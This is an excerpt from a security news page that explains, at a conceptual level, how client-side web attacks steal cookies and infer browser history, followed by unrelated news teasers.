Latest news
Confidentiality impact
Attacks described in this section all are concerned with accessing some confidential information on the client side. I look at cookie, history, file, and clipboard stealing attacks as well as attacks that are able to obtain information about protected internal network topology and phishing.
Cookies are pieces of data that is being sent by the server to be stored on the client for retrieval at a later time. Cookies are primarily used to allow for tracking of the client across multiple request/response cycles. Cookies, according to the same origin security policy, can only be retrieved by the server that sets them. As a result, web servers are not able to read cookies from other domains. Cookies themselves are not likely to represent an attack vector on the web client. However, they are a high value target for attackers, as a cookie with its purpose of identifying the client would help with attempts hijack a session and impersonate a client. Web mail clients, for instance, utilize cookies to identify a user at a later time, so the user does not have to provide their credentials each time they would like to access their mail. If an attacker can access the cookie, unauthorized access to the mail account could be obtained as demonstrated recently Perry at Defcon and Graham with SideJacking with Hamster.
The browser history and the browser cache are other confidential pieces of information attackers can gain access to. As a user visits web pages, the browser records these web pages in its cache and browser history. If an attacker can gain access to the cache or browser history, information, such as what email service or bank a user uses, can be inferred and used in subsequent attacks, such as phishing and cookie stealing attacks. Cache and browser history can be obtained via browser vulnerabilities, JavaScript, CSS, inspection of visited link color and timing attacks (e.g. see Grossman's post I know where you have been).
Spotlight
Information security executives need to be strategic thinkers
Posted on 17 June 2013. | George Baker, the Director of Information Security at Exostar, talks about the challenges in working in a dynamic threat landscape, offers tips for aspiring infosec leaders, and more.
Large orgs in denial about own security breaches?
Posted on 14 June 2013. | Over two thirds (66%) of large organizations said they either had not experienced a security incident in the last 12-18 months or were unsure if they had.
Vulnerability scanning with PureCloud
Posted on 12 June 2013. | nCircle PureCloud is a cloud-based network security scanning product built upon the companies' vulnerability and risk management system IP360.
To hack back or not to hack back?
Posted on 12 June 2013. | If you think of cyberspace as a new resource for you and your organization, it makes sense to protect your part of it as best you can. But is it a good idea?
Reactions from the security community to the NSA spying scandal
Posted on 11 June 2013. | Read on for comments on this scandal that Help Net Security received from a variety of security professionals and analysts.
By subscribing to our early morning news update, you will receive a daily digest of the latest security news published on Help Net Security.
With over 500 issues so far, reading our newsletter every Monday morning will keep you up-to-date with security risks out there.
 |
